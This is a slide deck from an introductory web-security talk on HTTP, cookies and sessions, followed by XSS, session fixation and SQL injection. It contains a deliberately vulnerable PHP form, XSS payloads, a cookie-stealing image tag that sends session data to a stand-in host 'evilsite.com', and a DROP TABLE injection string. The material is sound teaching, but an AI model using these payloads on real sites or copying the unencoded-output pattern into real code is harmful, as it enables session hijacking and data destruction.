1. Fundamentals of web
application security &
security testing
t0m <bobtfish@bobtfish.net>

2. Who are you?
• Open source hacker
• github.com/bobtfish/
• Perl guy (sorry) - 160 CPAN modules
• Core team for Catalyst and Plack web
frameworks.
• Ex professional security tester / R&D

3. This talk

4. This talk
• ~ 1h long

5. This talk
• ~ 1h long
• Covers the very basics
• HTTP
• Host headers
• Cookies

6. This talk
• ~ 1h long
• Covers the very basics
• HTTP
• Host headers
• Cookies
• Tools
• Paros / Charles / etc

8. • Sessions
• Session fixation attacks

9. • Sessions
• Session fixation attacks
• XSS (General HTML injection)
• How to test
• How to exploit

10. • Sessions
• Session fixation attacks
• XSS (General HTML injection)
• How to test
• How to exploit
• SQL Injection

11. • NOT comprehensive.

12. • NOT comprehensive.
• JUST the basics.

13. You don’t need to be a
programmer

14. You don’t need to be a
programmer
• I’m going to assume you know a bit about
the internet

15. You don’t need to be a
programmer
• I’m going to assume you know a bit about
the internet
• And that you’ve at least seen HTML before.

16. Workshop on Sunday

17. Workshop on Sunday
• No schedule - made by you!

18. Workshop on Sunday
• No schedule - made by you!

19. Workshop on Sunday
• No schedule - made by you!
• Deeper and more practical discussion

20. HTML

21. HTML
• The markup format that web pages are
written in.

22. HTML
• The markup format that web pages are
written in.
• I’m just assuming you all know the basics

23. HTML
• The markup format that web pages are
written in.
• I’m just assuming you all know the basics
• Sorry if you don’t ;P

24. HTML
• The markup format that web pages are
written in.
• I’m just assuming you all know the basics
• Sorry if you don’t ;P
• Can almost always be sloppy - browser
tries to do the right thing.

25. HTTP - The very basics

26. HTTP - The very basics
• HTTP goes over TCP/IP

27. HTTP - The very basics
• HTTP goes over TCP/IP
• Reliable, ordered

28. HTTP - The very basics
• HTTP goes over TCP/IP
• Reliable, ordered
• Host and port

29. HTTP - The very basics
• HTTP goes over TCP/IP
• Reliable, ordered
• Host and port
• Request / Response

30. HTTP - The very basics
• HTTP goes over TCP/IP
• Reliable, ordered
• Host and port
• Request / Response
• URL

31. HTTP - The very basics
• HTTP goes over TCP/IP
• Reliable, ordered
• Host and port
• Request / Response
• URL
• Method

32. Request / Response

33. Request / Response
• You ask the sever for some data

34. Request / Response
• You ask the sever for some data
• It does some work

35. Request / Response
• You ask the sever for some data
• It does some work
• And serves you a response, possibly
including data, called a ‘body’

36. Dynamic

37. Dynamic
• The response could just be a file on disc

38. Dynamic
• The response could just be a file on disc
• HTML, image, etc

39. Dynamic
• The response could just be a file on disc
• HTML, image, etc
• We’re interested about when it’s dynamic -
i.e. when your input changes the HTML
output.

40. GET / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 29 Aug 2012 21:47:59 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
ETag: "1c888b-0-4a90a5e239540"
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

41. GET / HTTP/1.0

42. GET / HTTP/1.0
• Simplest possible HTTP request

43. GET / HTTP/1.0
• Simplest possible HTTP request
• Method - GET

44. GET / HTTP/1.0
• Simplest possible HTTP request
• Method - GET
• URL /

45. GET / HTTP/1.0
• Simplest possible HTTP request
• Method - GET
• URL /
• HTTP version

46. GET / HTTP/1.0
• Simplest possible HTTP request
• Method - GET
• URL /
• HTTP version
• Followed by rnrn

47. GET / HTTP/1.0
• Headers optional after first line

48. GET / HTTP/1.0
• Headers optional after first line
• Body can be supplied after rnrn if you
specify a non-zero content length

49. GET / HTTP/1.0
• Headers optional after first line
• Body can be supplied after rnrn if you
specify a non-zero content length
• There will be examples of this later

50. HTTP/1.1 200 OK

51. HTTP/1.1 200 OK
• Always the first line of the response

52. HTTP/1.1 200 OK
• Always the first line of the response
• We asked for 1.0, got 1.1 back

53. HTTP/1.1 200 OK
• Always the first line of the response
• We asked for 1.0, got 1.1 back
• 200 is response code.
• 2xx - Success
• 3xx - Redirect
• 4xx - User error
• 5xx - Server error

54. Date: Wed, 29 Aug 2012
21:47:59 GMT
• Other headers now follow. All in format:
Key:Value
• Date: RFC822
• Optional

55. Server: Apache
• Sometimes has exact versions and
extensions
• Easy to lie
• Optional

56. Last-Modified: Wed, 27
Jul 2011 10:18:21 GMT
• Used for caching (maybe)
• Optional

57. ETag:
"1c888b-0-4a90a5e239540"
• Used for caching (maybe)
• Optional

58. Accept-Ranges: bytes
• ‘Partial GET’
• Ask for a byte range in the file
• Get back just that part
• Used by ‘download managers’ to resume
• Optional

59. Content-Length: 0
• Mandatory!
• Specifies how long the body is
• Can be 0

60. Vary: Accept-Encoding
• For caching
• What header fields mean a different
version of the document
• E.g. language detection
• Optional

61. Connection: close
• Server is going to drop the connection, you
have to reconnect.
• Possible to keep the connection persistent,
if you ask for it

62. Content-Type:
text/html
• How the browser should interpret the
body
• Mandatory for documents with a body

63. HTTP 1.1
• Adds a mandatory Host header to the
request
• Allows > 1 web site per IP address

64. GET / HTTP/1.1
Host: goatse.co.uk
HTTP/1.1 200 OK
Date: Wed, 29 Aug 2012 21:49:49 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
ETag: "1c888b-0-4a90a5e239540"
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

65. Sending data to the
server

66. Sending data to the
server
• Encode it into the URI

67. Sending data to the
server
• Encode it into the URI
• /with/a/path

68. Sending data to the
server
• Encode it into the URI
• /with/a/path
• /?or=parameters

69. POST

70. POST
• Used to send data back to the server

71. POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
urlencoded

72. POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
urlencoded
• Has a Content-Length, and a body

73. POST
• Used to send data back to the server
• Content-Type: application/x-www-form-
urlencoded
• Has a Content-Length, and a body
• Data is encoded like this:
foo=bar&foo2=baz

74. POST
POST / HTTP/1.1
Host: www.example.com
Content-Length: 17
Content-Type: application/x-www-form-urlencoded
foo=bar&foo2=quux

75. Forms
• HTML forms are the primary means of
getting user data to the server
• Data is in the body, not the URL, so they
don’t get saved in bookmarks
• <form> tag
• <input> tag

76. Ok - basics covered!

77. Ok - basics covered!
• Phew!

78. Ok - basics covered!
• Phew!
• Lets put all this stuff together - into an
application.

79. Ok - basics covered!
• Phew!
• Lets put all this stuff together - into an
application.
• And then hack it.

80. Simplest possible app
<html>
Data is: <form>
<input name=”foo” value=”<?php echo
$_GET['foo'] ?>” />
<input type=”submit” />
</form>
</html>

81. http://server/test.php?
foo=foo

82. FAIL

83. FAIL
• Did you spot the epic fail?

84. FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”

85. FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”
• Golden rule - never ever accept input
without validating it’s sane

86. FAIL
• Did you spot the epic fail?
• value=”<?php echo $_GET['foo'] ?>”
• Golden rule - never ever accept input
without validating it’s sane
• Golden rule - never ever output anything
that may have come from external input
without encoding it

87. WHY?

88. WHY?
• You can send: ?foo="><blink>Foo<
%2Fblink>

89. WHY?
• You can send: ?foo="><blink>Foo<
%2Fblink>
• Comes out as: <input name="foo"
value=""><blink>Foo</blink>

90. WHY?
• You can send: ?foo="><blink>Foo<
%2Fblink>
• Comes out as: <input name="foo"
value=""><blink>Foo</blink>
• You just added HTML to the document -
fail!

91. Javascript

92. Javascript
• Is where it all goes really wrong

93. Javascript
• Is where it all goes really wrong
• Can change or rewrite the page

94. Javascript
• Is where it all goes really wrong
• Can change or rewrite the page
• Can be inserted inline into HTML

95. Javascript
• Is where it all goes really wrong
• Can change or rewrite the page
• Can be inserted inline into HTML
• foo="><script>document.removeChild(doc
ument.getElementsByTagName('html')[0])<
%2Fscript>

96. Bye bye page!

97. Less simple example

98. Less simple example
• Add data storage

99. Less simple example
• Add data storage
• E.g. Message board multiple people can
look at

100. Less simple example
• Add data storage
• E.g. Message board multiple people can
look at
• Doom!

101. Less simple example
• Add data storage
• E.g. Message board multiple people can
look at
• Doom!
• Or at least vandalism

102. More theory

103. More theory
• Sorry, but it’s necessary

104. More theory
• Sorry, but it’s necessary
• People’s credit card numbers are behind
login pages

105. More theory
• Sorry, but it’s necessary
• People’s credit card numbers are behind
login pages
• So we have to understand how logins work
to steal them

106. Cookies

107. Cookies

108. Cookies
Not like that!

109. Cookies

110. Cookies
Or that!

111. Cookies

112. Cookies
Definitely not!

113. Set-Cookie

114. Set-Cookie
• A request header

115. Set-Cookie
• A request header
• Set-Cookie: foo=bar

116. Set-Cookie
• A request header
• Set-Cookie: foo=bar
• Set-Cookie: foo=bar; expires=Thu, 01-
Jan-1970 00:01:40 GMT; path=/;
domain=example.net

117. Affects subsequent
requests
Browser returns “Cookie: foo=bar” header

118. Sessions

119. Sessions
• Hand each visitor a random session token,
identify them in future

120. Sessions
• Hand each visitor a random session token,
identify them in future
• Login credentials only transmitted once

121. Sessions
• Hand each visitor a random session token,
identify them in future
• Login credentials only transmitted once
• Allows login to be SSL (and rest of site not)

122. Sessions

123. Sessions
• Shared secret

124. Sessions
• Shared secret
• If it stops being a secret, you lose!

125. Stealing cookies

126. Stealing cookies
• Can get cookie data from javascript

127. Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
we can run code that grabs the cookie

128. Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
we can run code that grabs the cookie
• “Same origin policy” - cannot transmit
elsewhere.

129. Stealing cookies
• Can get cookie data from javascript
• If we find an HTML injection vulnerability,
we can run code that grabs the cookie
• “Same origin policy” - cannot transmit
elsewhere.
• Cheat! Add content to the document.

130. <img src=”http://evilsite.com/?data=here” />

131. Lets step through that

132. Lets step through that
• Message board site gives users a cookie
when they login

133. Lets step through that
• Message board site gives users a cookie
when they login
• Cookie contains session token

134. Lets step through that
• Message board site gives users a cookie
when they login
• Cookie contains session token
• You post an evil message containing
Javascript

135. Lets step through that
• Message board site gives users a cookie
when they login
• Cookie contains session token
• You post an evil message containing
Javascript
• Other users view your message

136. Lets step through that

137. Lets step through that
• Other user’s browsers execute your
javascript

138. Lets step through that
• Other user’s browsers execute your
javascript
• It grabs their cookie

139. Lets step through that
• Other user’s browsers execute your
javascript
• It grabs their cookie
• Adds to their page: <img src=”http://
evilsite.com/?data=cookie_data” />

140. Lets step through that
• Other user’s browsers execute your
javascript
• It grabs their cookie
• Adds to their page: <img src=”http://
evilsite.com/?data=cookie_data” />
• Users browser tries to download image

141. Lets step through that

142. Lets step through that
• evilsite.com records the cookie

143. Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
gif

144. Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
gif
• I can now post messages as any (still logged
in) user who viewed my message.

145. Lets step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
gif
• I can now post messages as any (still logged
in) user who viewed my message.
• Having the users’s cookie allows you to
become the user

146. Did you notice the
handwave?

147. Did you notice the
handwave?
• I need a way to get your cookie into my
browser

148. Did you notice the
handwave?
• I need a way to get your cookie into my
browser
• This is easy to do - find a proxy library in
your favourite programming language ;P

149. Did you notice the
handwave?
• I need a way to get your cookie into my
browser
• This is easy to do - find a proxy library in
your favourite programming language ;P
• Or tools you can just download

150. Session fixation

151. Session fixation
• Quite a common bug

152. Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
like

153. Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
like
• Useful for abusing XSS elsewhere

154. Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
like
• Useful for abusing XSS elsewhere
• Also good to steal logins without needing
XSS.

155. Session fixation
• Quite a common bug
• Allows you to specify the session ID you’d
like
• Useful for abusing XSS elsewhere
• Also good to steal logins without needing
XSS.
• /?sessionID=XXXXXXXXXXX

156. Tools

157. Tools - Paros
• http://www.parosproxy.org/

160. Tools - Charles
• OSX only
• Costs money (free trial)

162. Tools - Firebug

163. Tools - Firebug
• Firefox addon

164. Tools - Firebug
• Firefox addon
• Allows you to debug javascript and HTML

165. Tools - Firebug
• Firefox addon
• Allows you to debug javascript and HTML
• Useful for getting exploits working in
combination with another tool

167. SQL Injection

168. SQL Injection
• SQL used by databases, for data storage

169. SQL Injection
• SQL used by databases, for data storage
• Tables, with columns and rows

170. SQL Injection
• SQL used by databases, for data storage
• Tables, with columns and rows
• SELECT id, name FROM users WHERE
name = ‘fred’ AND password = ‘example’;

171. SQL Injection
• SQL used by databases, for data storage
• Tables, with columns and rows
• SELECT id, name FROM users WHERE
name = ‘fred’ AND password = ‘example’;
• SAME ISSUE AS BEFORE

172. SQL Injection

173. SELECT id, name FROM users WHERE name
= ‘Robert'); DROP TABLE Students;--’ AND
password = ‘example’;

174. First query.
No password needed!
SELECT id, name FROM users WHERE name
= ‘Robert'); DROP TABLE Students;--’ AND
password = ‘example’;

175. Second query.
Ruins your day!
SELECT id, name FROM users WHERE name
= ‘Robert'); DROP TABLE Students;--’ AND
password = ‘example’;

176. Comment - ignored!
SELECT id, name FROM users WHERE name
= ‘Robert'); DROP TABLE Students;--’ AND
password = ‘example’;

177. Golden Rules

178. Golden Rules
• Never ever accept input without validating
it’s sane.

179. Golden Rules
• Never ever accept input without validating
it’s sane.
• Never ever output anything that may have
come from external input without encoding
it.

180. Thanks for listening!
• Hope that wasn’t too boring :)
• Feel free to come chat to me.
• Or mail me: bobtfish@bobtfish.net
• Or grab me on irc: t0m on Freenode
• More in-depth workshop on Sunday!